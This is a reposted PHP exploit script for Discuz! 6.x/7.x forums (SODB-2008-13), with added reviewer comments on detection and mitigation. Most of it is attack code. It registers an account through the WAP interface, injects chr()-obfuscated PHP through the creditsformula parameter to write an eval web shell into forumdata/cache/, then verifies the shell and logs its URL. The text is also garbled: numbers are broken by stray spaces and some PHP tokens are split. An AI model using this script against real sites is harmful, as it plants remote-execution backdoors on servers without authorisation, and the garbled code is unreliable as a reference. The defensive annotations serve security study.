Discuz! 6.x/7.x SODB-2008-13 Exp: fully automatic SHELL retrieval with logging - vulnerability warning - the black bar safety net

2009-01-07T00:00:00
ID MYHACK58:62200921848
Type myhack58
Reporter 佚名
Modified 2009-01-07T00:00:00

Description

`================Discuz.php=========================

!/ usr/bin/php

<? php /* * Discuz! 6. x/7. x SODB-2 0 0 8-1 3 Exp * By www.80vul.com * Notes the value of the variable, add your own modifications /

// Argument handling: with fewer than two command-line arguments the script prints the usage
// text below and stops; otherwise argument 1 becomes $host and argument 2 becomes $path.
// NOTE(review): the usage text says "path to phpcms", yet every request in this script goes
// to Discuz! paths (wap/index.php, forumdata/cache/) - presumably a leftover from another script.
if ($argc<3) { print_r('


Usage: php '.$ argv[0].' host path host: target server (ip/hostname),without"http://" path: path to phpcms Example: php '.$ argv[0].' localhost /


'); die; } // $host = 'www.80vul.com'; // Server domain or IP // $path = '/'; // Program to the path where these have been by the parameter acquisition, do not trouble you....... $host=$argv[1]; $path=$argv[2]; $key = 1; // The above variable is edited, make will the value here to 1,has been changing for the better......

// Sanity gate: the script exits when $host contains "://", when $path contains no "/",
// or when $key is not exactly 1.
if (strpos($host, '://') !== false || strpos($path, '/') === false || $key !== 1) exit("a professional point well,the first look inside the comments -,-\n");

// Runtime setup: error reporting level 7 and no execution time limit.
error_reporting(7); ini_set('max_execution_time', 0);

// Registration request: the current timestamp is reused as username, password and e-mail
// local part, and the body is posted by send() to wap/index.php. Besides the visible form
// fields (action, username, password, email) the body carries a _DCACHE=1 parameter.
// Detection: _DCACHE is not one of those form fields, so a WAP registration POST that names
// it is worth alerting on in web logs or WAF rules - presumably no regular client sends it.
$key = time(); $cmd = 'action=register&username='.$ key.'& password='.$ key.'& email='.$ key.'@ 80vul. com&_DCACHE=1'; $resp = send();

// The session id is scraped from the logout link in the response; the pattern expects an
// 8-character formhash followed by a 6-character sid.
preg_match('/logout=yes&formhash=[a-z0-9]{8}&sid=([a-zA-Z0-9]{6})/', $resp, $sid);

// Without a sid the script stops here. Its own message attributes this to WAP registration
// not being enabled, so a site with WAP registration disabled does not get past this point
// of the script as written.
if (!$ sid) exit("Oh,is probably not turned on the WAP registration! The detection of the next......\ n");

// Second POST: reuses the scraped sid and sets stylejump, styleid, inajax, transsidstatus and
// creditsformula. The creditsformula value is a PHP "${${...}}" expression that calls
// fputs(fopen(...)), so it only has an effect if the server evaluates this request parameter
// as PHP code. File path, open mode and file content are all spelled with chr() codes, which
// keeps readable paths and PHP tags out of the request body and defeats naive string matching.
// Detection: alert on request bodies sent to wap/index.php that contain "creditsformula="
// together with "${" or long chr( chains.
// Mitigation: update Discuz! to a release that fixes SODB-2008-13, and where the deployment
// allows it deny direct HTTP requests for .php files under forumdata/cache/.
$cmd = 'stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid='.$ sid[1].'& creditsformula=${${fputs(fopen(chr(4 6). chr(4 6). chr(4 7). chr(1 0 2). chr(1 1 1). chr(1 1 4). chr(1 1 7). chr(1 0 9). chr(1 0 0). chr(9 7). chr(1 1 6). chr(9 7). chr(4 7). chr(9 9). chr(9 7). chr(9 9). chr(1 0 4). chr(1 0 1). chr(4 7). chr(1 0 1). chr(1 1 8). chr(9 7). chr(1 0 8). chr(4 6). chr(1 1 2). chr(1 0 4). chr(1 1 2),chr(1 1 9). chr(4 3)),chr(6 0). chr(6 3). chr(1 0 1). chr(1 1 8). chr(9 7). chr(1 0 8). chr(4 0). chr(3 6). chr(9 5). chr(8 0). chr(7 9). chr(8 3). chr(8 4). chr(9 1). chr(9 9). chr(9 3). chr(4 1). chr(6 3). chr(6 2). chr(5 6). chr(4 8). chr(1 1 8). chr(1 1 7). chr(1 0 8))}}'; send();

// Success check: the script builds the URL of forumdata/cache/eval.php on the target, fetches
// it over HTTP and compares the response body with the marker string '80vul'.
// Indicators for responders: an unexpected eval.php inside forumdata/cache/, and a GET for
// that file arriving right after POSTs to wap/index.php from the same client.
$shell = 'http://'.$ host.$ path.'forumdata/cache/eval.php';

// On a match the URL is appended to a local resulturl.txt (opened in "a+" mode) followed by
// CRLF, and the script exits with a success message; otherwise it exits with a failure
// message. NOTE(review): is_writable() is only checked after fopen() has already been called,
// and the fopen() return value itself is never tested.
if (file_get_contents($shell) == '80vul') { $filename = "resulturl.txt"; $handle = fopen ($filename,"a+"); //open the file pointer, create a file / Check whether the file is created and writable / if (! is_writable ($filename)){ die ("file:".$ filename." Not writable, check its properties after the retry!"); } /Here write successful the following should be no problem, not much testing./ if (! fwrite ($handle,$shell)){ //writes information to file die ("generate file".$ filename." Failed!"); } fwrite($handle,"\r\n"); fclose ($handle); //close the pointer

exit("\n save Shell successfully!\ nWebShell:\t$shell\n"); } else exit("probably the site does not exist vulnerability,for a!\ n");

// send(): builds a raw HTTP/1.1 POST to {$path}wap/index.php from the globals $host, $path
// and $cmd, writes it to a TCP socket and returns everything read back until EOF.
// It takes no parameters; the request body is whatever $cmd holds at call time.
// NOTE(review): $url is declared global but never used in the visible code.
function send() { global $host, $path, $url, $cmd;

// The request headers are fixed: Accept-Language zh-cn, an Opera/9.62 User-Agent, a Referer
// pointing at the site root and Connection: Close. Unmodified copies of this script are
// therefore fingerprintable in access logs by that header combination on wap/index.php POSTs.
$data = "POST ".$ path."wap/index.php HTTP/1.1\r\n"; $data .= "Accept: /\r\n"; $data .= "Accept-Language: zh-cn\r\n"; $data .= "Referer: http://$host$path\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "Connection: Close\r\n"; $data .= "Content-Length: ". strlen($cmd)."\ r\n\r\n"; $data .= $cmd;

// Plain TCP connection (the port is printed as "8 0" on this page, presumably 80); no timeout
// is passed and the result of fsockopen() is not checked before fputs().
$fp = fsockopen($host, 8 0); fputs($fp, $data);

$resp = ";

// Reads the response in chunks until EOF; the loop is skipped entirely when $fp is false.
while ($fp && ! feof($fp)) $resp .= fread($fp, 1 0 2 4);

return $resp; }

?> ======================END===================== `Write a batch is not wordy, the front one has told you.......